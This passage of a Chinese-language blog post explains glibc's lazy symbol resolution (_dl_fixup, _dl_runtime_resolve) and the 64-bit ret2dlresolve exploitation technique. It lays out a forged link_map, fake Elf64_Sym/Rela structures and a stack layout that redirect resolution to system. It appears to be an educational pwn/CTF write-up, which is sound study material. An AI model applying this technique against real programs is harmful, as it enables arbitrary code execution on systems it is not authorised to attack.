data-lang="c"><span class="line"><span class="cl"> <span class="n">result</span> <span class="o">=</span> <span class="nf">_dl_lookup_symbol_x</span> <span class="p">(</span><span class="n">strtab</span> <span class="o">+</span> <span class="n">sym</span><span class="o">-&gt;</span><span class="n">st_name</span><span class="p">,</span> <span class="cm">/* 参数1: 符号名 */</span> </span></span><span class="line"><span class="cl"> <span class="n">l</span><span class="p">,</span> <span class="cm">/* 参数2: 搜索起始 link_map */</span> </span></span><span class="line"><span class="cl"> <span class="o">&amp;</span><span class="n">sym</span><span class="p">,</span> <span class="cm">/* 参数3: 符号结构体指针 (输入/输出) */</span> </span></span><span class="line"><span class="cl"> <span class="n">l</span><span class="o">-&gt;</span><span class="n">l_scope</span><span class="p">,</span> <span class="cm">/* 参数4: 搜索范围 (Scope) */</span> </span></span><span class="line"><span class="cl"> <span class="n">version</span><span class="p">,</span> <span class="cm">/* 参数5: 版本信息 */</span> </span></span><span class="line"><span class="cl"> <span class="nf">elf_machine_type_class</span> <span class="p">(</span><span class="n">type</span><span class="p">),</span> <span class="cm">/* 参数6: 类型分类 */</span> </span></span><span class="line"><span class="cl"> <span class="n">flags</span><span class="p">,</span> <span class="cm">/* 参数7: 标志位 */</span> </span></span><span class="line"><span class="cl"> <span class="nb">NULL</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="cm">/* We are done with the global scope. */</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">RTLD_SINGLE_THREAD_P</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nf">THREAD_GSCOPE_RESET_FLAG</span> <span class="p">();</span> </span></span></code></pre></td></tr></table> </div> </div><p>进入 _dl_lookup_symbol_x</p> <p>出来后是锁操作</p> <h3 id="收尾处理">收尾处理 </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"> <span class="cm">/* Currently result contains the base load address (or link map) </span></span></span><span class="line"><span class="cl"><span class="cm"> of the object that defines sym. Now add in the symbol </span></span></span><span class="line"><span class="cl"><span class="cm"> offset. */</span> </span></span><span class="line"><span class="cl"> <span class="n">value</span> <span class="o">=</span> <span class="nf">DL_FIXUP_MAKE_VALUE</span> <span class="p">(</span><span class="n">result</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nf">SYMBOL_ADDRESS</span> <span class="p">(</span><span class="n">result</span><span class="p">,</span> <span class="n">sym</span><span class="p">,</span> <span class="nb">false</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="cm">/* We already found the symbol. The module (and therefore its load </span></span></span><span class="line"><span class="cl"><span class="cm"> address) is also known. */</span> </span></span><span class="line"><span class="cl"> <span class="n">value</span> <span class="o">=</span> <span class="nf">DL_FIXUP_MAKE_VALUE</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="nf">SYMBOL_ADDRESS</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">sym</span><span class="p">,</span> <span class="nb">true</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="n">result</span> <span class="o">=</span> <span class="n">l</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="cm">/* And now perhaps the relocation addend. */</span> </span></span><span class="line"><span class="cl"> <span class="n">value</span> <span class="o">=</span> <span class="nf">elf_machine_plt_value</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">reloc</span><span class="p">,</span> <span class="n">value</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">sym</span> <span class="o">!=</span> <span class="nb">NULL</span> </span></span><span class="line"><span class="cl"> <span class="o">&amp;&amp;</span> <span class="nf">__builtin_expect</span> <span class="p">(</span><span class="nf">ELFW</span><span class="p">(</span><span class="n">ST_TYPE</span><span class="p">)</span> <span class="p">(</span><span class="n">sym</span><span class="o">-&gt;</span><span class="n">st_info</span><span class="p">)</span> <span class="o">==</span> <span class="n">STT_GNU_IFUNC</span><span class="p">,</span> <span class="mi">0</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">value</span> <span class="o">=</span> <span class="nf">elf_ifunc_invoke</span> <span class="p">(</span><span class="nf">DL_FIXUP_VALUE_ADDR</span> <span class="p">(</span><span class="n">value</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="cm">/* Finally, fix up the plt itself. */</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="nf">__glibc_unlikely</span> <span class="p">(</span><span class="nf">GLRO</span><span class="p">(</span><span class="n">dl_bind_not</span><span class="p">)))</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">value</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nf">elf_machine_fixup_plt</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">result</span><span class="p">,</span> <span class="n">refsym</span><span class="p">,</span> <span class="n">sym</span><span class="p">,</span> <span class="n">reloc</span><span class="p">,</span> <span class="n">rel_addr</span><span class="p">,</span> <span class="n">value</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p><strong>if 分支:</strong> 当前 result 变量包含了定义该符号的对象的基加载地址(或者 link_map 指针),现在加上符号的偏移量 即 <code>value = result-&gt;l_addr + sym-&gt;st_value</code></p> <p><strong>else 分支:</strong> 我们已经找到了符号,模块(因此也包括它的加载地址)也是已知的 即 <code>value = l-&gt;l_addr + sym-&gt;st_value</code></p> <p>接下来处理 GNU Indirect Function (IFUNC)</p> <p>最后把 value 写入相应的 GOT 表条目中</p> <p>要求 <code>rel_addr = (void *)(l-&gt;l_addr + reloc-&gt;r_offset)</code> 可写</p> <hr> <h2 id="_dl_runtime_resolve-部分分析">_dl_runtime_resolve 部分分析 </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-asm" data-lang="asm"><span class="line"><span class="cl"> <span class="c1"># Copy args pushed by PLT in register. </span></span></span><span class="line"><span class="cl"> <span class="c1"># %rdi: link_map, %rsi: reloc_index </span></span></span><span class="line"><span class="cl"> <span class="nf">mov</span> <span class="p">(</span><span class="no">LOCAL_STORAGE_AREA</span> <span class="err">+</span> <span class="mi">8</span><span class="p">)(</span><span class="nv">%BASE</span><span class="p">),</span> <span class="nv">%RSI_LP</span> </span></span><span class="line"><span class="cl"> <span class="nf">mov</span> <span class="no">LOCAL_STORAGE_AREA</span><span class="p">(</span><span class="nv">%BASE</span><span class="p">),</span> <span class="nv">%RDI_LP</span> </span></span><span class="line"><span class="cl"> <span class="nf">call</span> <span class="no">_dl_fixup</span> <span class="c1"># Call resolver. </span></span></span></code></pre></td></tr></table> </div> </div><p><code>LOCAL_STORAGE_AREA(%BASE)</code> 为进入 _dl_runtime_resolve 时 rsp 位置上的值,将传入 rdi ,作为 link_map 指针 <code>(LOCAL_STORAGE_AREA + 8)(%BASE)</code> 为进入 _dl_runtime_resolve 时 rsp + 8 位置上的值,将传入 rsi ,作为 reloc_arg (uint32_t)</p> <hr> <h2 id="64-位下利用">64 位下利用 </h2><p>为了避免段错误,我们引导函数执行至以下片段</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="cm">/* We already found the symbol. The module (and therefore its load </span></span></span><span class="line"><span class="cl"><span class="cm"> address) is also known. */</span> </span></span><span class="line"><span class="cl"> <span class="n">value</span> <span class="o">=</span> <span class="nf">DL_FIXUP_MAKE_VALUE</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="nf">SYMBOL_ADDRESS</span> <span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">sym</span><span class="p">,</span> <span class="nb">true</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="n">result</span> <span class="o">=</span> <span class="n">l</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>这要求 <code>sym-&gt;st_other</code> 不为 0</p> <p>然后通过 <code>value = l-&gt;l_addr + sym-&gt;st_value</code> 计算出我们希望写入 got 表中的那个地址</p> <p>我们需要:</p> <ul> <li>伪造 <code>link_map-&gt;l_addr</code> 为 libc 中已解析函数与想要执行的目标函数的偏移值,如 <code>addr_system - addr_xxx</code></li> <li>伪造 <code>sym-&gt;st_value</code> 为已经解析过的某个函数的 got 表的位置,这需要布置 sym 的位置</li> <li>也就是相当于 <code>value = l_addr + st_value = addr_system - addr_xxx + real_xxx = real_system</code></li> </ul> <p>又</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="n">Elf64_Sym</span> <span class="o">*</span><span class="n">symtab</span> <span class="o">=</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">l_info</span><span class="p">[</span><span class="n">DT_SYMTAB</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">d_un</span><span class="p">.</span><span class="n">d_ptr</span> </span></span><span class="line"><span class="cl"><span class="n">Elf64_Rela</span> <span class="o">*</span><span class="n">reloc</span> <span class="o">=</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">l_info</span><span class="p">[</span><span class="n">DT_JMPREL</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">d_un</span><span class="p">.</span><span class="n">d_ptr</span> <span class="o">+</span> <span class="n">reloc_arg</span> </span></span><span class="line"><span class="cl"><span class="n">Elf64_Sym</span> <span class="o">*</span><span class="n">sym</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">symtab</span><span class="p">[(</span><span class="n">reloc</span><span class="o">-&gt;</span><span class="n">r_info</span><span class="p">)</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">]</span> </span></span></code></pre></td></tr></table> </div> </div><p>即</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="n">sym</span> <span class="o">=</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">l_info</span><span class="p">[</span><span class="n">DT_SYMTAB</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">d_un</span><span class="p">.</span><span class="n">d_ptr</span> <span class="o">+</span> <span class="p">(((</span><span class="n">l</span><span class="o">-&gt;</span><span class="n">l_info</span><span class="p">[</span><span class="n">DT_JMPREL</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">d_un</span><span class="p">.</span><span class="n">d_ptr</span> <span class="o">+</span> <span class="n">reloc_arg</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">r_info</span><span class="p">)</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">)</span> </span></span></code></pre></td></tr></table> </div> </div><p>再放一遍</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="n">Elf64_Sym</span> <span class="o">*</span><span class="n">symtab</span> <span class="o">=</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">l_info</span><span class="p">[</span><span class="n">DT_SYMTAB</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">d_un</span><span class="p">.</span><span class="n">d_ptr</span> </span></span><span class="line"><span class="cl"><span class="kt">char</span> <span class="o">*</span><span class="n">strtab</span> <span class="o">=</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">l_info</span><span class="p">[</span><span class="n">DT_STRTAB</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">d_un</span><span class="p">.</span><span class="n">d_ptr</span> </span></span><span class="line"><span class="cl"><span class="n">Elf64_Rela</span> <span class="o">*</span><span class="n">reloc</span> <span class="o">=</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">l_info</span><span class="p">[</span><span class="n">DT_JMPREL</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">d_un</span><span class="p">.</span><span class="n">d_ptr</span> <span class="o">+</span> <span class="n">reloc_arg</span> </span></span><span class="line"><span class="cl"><span class="n">Elf64_Sym</span> <span class="o">*</span><span class="n">sym</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">symtab</span><span class="p">[(</span><span class="n">reloc</span><span class="o">-&gt;</span><span class="n">r_info</span><span class="p">)</span> <span class="o">&gt;&gt;</span> <span class="mi">32</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">Elf64_Sym</span> <span class="o">*</span><span class="n">refsym</span> <span class="o">=</span> <span class="n">sym</span> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="o">*</span><span class="n">rel_addr</span> <span class="o">=</span> <span class="n">l</span><span class="o">-&gt;</span><span class="n">l_addr</span> <span class="o">+</span> <span class="n">reloc</span><span class="o">-&gt;</span><span class="n">r_offset</span> </span></span><span class="line"><span class="cl"><span class="n">link_map</span> <span class="o">*</span><span class="n">result</span> </span></span><span class="line"><span class="cl"><span class="kt">uint64_t</span> <span class="n">value</span> </span></span></code></pre></td></tr></table> </div> </div><p>综上,所有需要伪造的数据为:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#stack: </span></span></span><span class="line"><span class="cl"><span class="n">link_map</span> <span class="o">*</span><span class="n">l</span> <span class="o">-&gt;</span> <span class="n">fake</span> <span class="n">link_map</span> </span></span><span class="line"><span class="cl"><span class="n">reloc_arg</span> <span class="o">=</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="cp">#rw: </span></span></span><span class="line"><span class="cl"><span class="n">fake</span> <span class="n">link_map</span> <span class="nl">structure</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">l_addr</span> <span class="o">=</span> <span class="n">addr_system</span> <span class="o">-</span> <span class="n">addr_xxx</span> </span></span><span class="line"><span class="cl"> <span class="n">l_info</span><span class="p">[</span><span class="nf">DT_STRTAB</span> <span class="p">(</span><span class="mi">5</span><span class="p">)]</span> <span class="o">-&gt;</span> <span class="n">Null</span> <span class="n">fake</span> <span class="n">Elf64_Dyn</span> <span class="n">structure</span> </span></span><span class="line"><span class="cl"> <span class="n">l_info</span><span class="p">[</span><span class="nf">DT_SYMTAB</span> <span class="p">(</span><span class="mi">6</span><span class="p">)]</span> <span class="o">-&gt;</span> <span class="n">fake</span> <span class="n">Elf64_Dyn</span> <span class="n">structure</span> <span class="n">to</span> <span class="n">fake</span> <span class="n">Elf64_Sym</span> <span class="nf">structure</span> <span class="p">(.</span><span class="n">got</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">l_info</span><span class="p">[</span><span class="nf">DT_JMPREL</span> <span class="p">(</span><span class="mi">23</span><span class="p">)]</span> <span class="o">-&gt;</span> <span class="n">fake</span> <span class="n">Elf64_Dyn</span> <span class="n">structure</span> <span class="n">to</span> <span class="n">fake</span> <span class="n">Elf64_Rela</span> <span class="n">structure</span> </span></span><span class="line"><span class="cl"><span class="n">fake</span> <span class="n">Elf64_Dyn</span> <span class="n">structure</span> <span class="o">-&gt;</span> <span class="n">fake</span> <span class="nl">Elf64_Sym</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">d_ptr</span> <span class="o">-&gt;</span> <span class="n">fake</span> <span class="nf">Elf64_Sym</span> <span class="p">(.</span><span class="n">got</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">fake</span> <span class="n">Elf64_Dyn</span> <span class="n">structure</span> <span class="o">-&gt;</span> <span class="n">fake</span> <span class="nl">Elf64_Rela</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">d_ptr</span> <span class="o">-&gt;</span> <span class="n">fake</span> <span class="n">Elf64_Rela</span> </span></span><span class="line"><span class="cl"><span class="n">fake</span> <span class="n">Elf64_Rela</span> <span class="nl">structure</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">r_offset</span> <span class="o">=</span> <span class="n">rwable_addr</span> <span class="o">-</span> <span class="n">l_addr</span> </span></span><span class="line"><span class="cl"> <span class="n">r_info</span> <span class="n">lower</span> <span class="mi">4</span> <span class="n">bytes</span> <span class="o">=</span> <span class="mi">7</span> </span></span><span class="line"><span class="cl"> <span class="n">r_info</span> <span class="n">higher</span> <span class="mi">4</span> <span class="n">bytes</span> <span class="o">=</span> <span class="mi">0</span> </span></span></code></pre></td></tr></table> </div> </div><p>根据偏移对 link_map 进行压缩布局:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="mh">0x00</span><span class="o">--</span><span class="mh">0x08</span> <span class="n">l_addr</span> <span class="o">=</span> <span class="n">addr_system</span> <span class="o">-</span> <span class="n">addr_xxx</span> </span></span><span class="line"><span class="cl"><span class="mh">0x08</span><span class="o">--</span><span class="mh">0x10</span> <span class="n">d_ptr</span> <span class="o">-&gt;</span> <span class="n">fake</span> <span class="nf">Elf64_Sym</span> <span class="p">(.</span><span class="n">got</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="mh">0x10</span><span class="o">--</span><span class="mh">0x18</span> <span class="n">d_ptr</span> <span class="o">-&gt;</span> <span class="mh">0x18</span> </span></span><span class="line"><span class="cl"><span class="mh">0x18</span><span class="o">--</span><span class="mh">0x20</span> <span class="n">r_offset</span> <span class="o">=</span> <span class="n">rwable_addr</span> <span class="o">-</span> <span class="n">l_addr</span> </span></span><span class="line"><span class="cl"><span class="mh">0x18</span><span class="o">--</span><span class="mh">0x20</span> <span class="n">r_info</span> <span class="o">=</span> <span class="mh">0x00000007</span> </span></span><span class="line"><span class="cl"><span class="p">...</span> </span></span><span class="line"><span class="cl"><span class="mh">0x38</span><span class="o">--</span><span class="mi">0</span><span class="n">x</span><span class="o">??</span> <span class="n">l_info</span> </span></span><span class="line"><span class="cl"><span class="mh">0x68</span><span class="o">--</span><span class="mh">0x70</span> <span class="n">l_info</span><span class="p">[</span><span class="nf">DT_STRTAB</span> <span class="p">(</span><span class="mi">5</span><span class="p">)]</span> <span class="o">-&gt;</span> <span class="mh">0x00</span> </span></span><span class="line"><span class="cl"><span class="mh">0x70</span><span class="o">--</span><span class="mh">0x78</span> <span class="n">l_info</span><span class="p">[</span><span class="nf">DT_SYMTAB</span> <span class="p">(</span><span class="mi">6</span><span class="p">)]</span> <span class="o">-&gt;</span> <span class="mh">0x00</span> </span></span><span class="line"><span class="cl"><span class="p">...</span> </span></span><span class="line"><span class="cl"><span class="mh">0xF8</span><span class="o">--</span><span class="mh">0x100</span> <span class="n">l_info</span><span class="p">[</span><span class="nf">DT_JMPREL</span> <span class="p">(</span><span class="mi">23</span><span class="p">)]</span> <span class="o">-&gt;</span> <span class="mh">0x08</span> </span></span></code></pre></td></tr></table> </div> </div><p>stack 布局:</p> <p>注意 _dl_runtime_resolve 有点像 srop 会还原寄存器</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">0 高地址 </span></span><span class="line"><span class="cl">fake_link_map_base_addr </span></span><span class="line"><span class="cl">ret2plt0 </span></span><span class="line"><span class="cl">寄存器操作 rop 链 低地址 </span></span></code></pre></td></tr></table> </div> </div>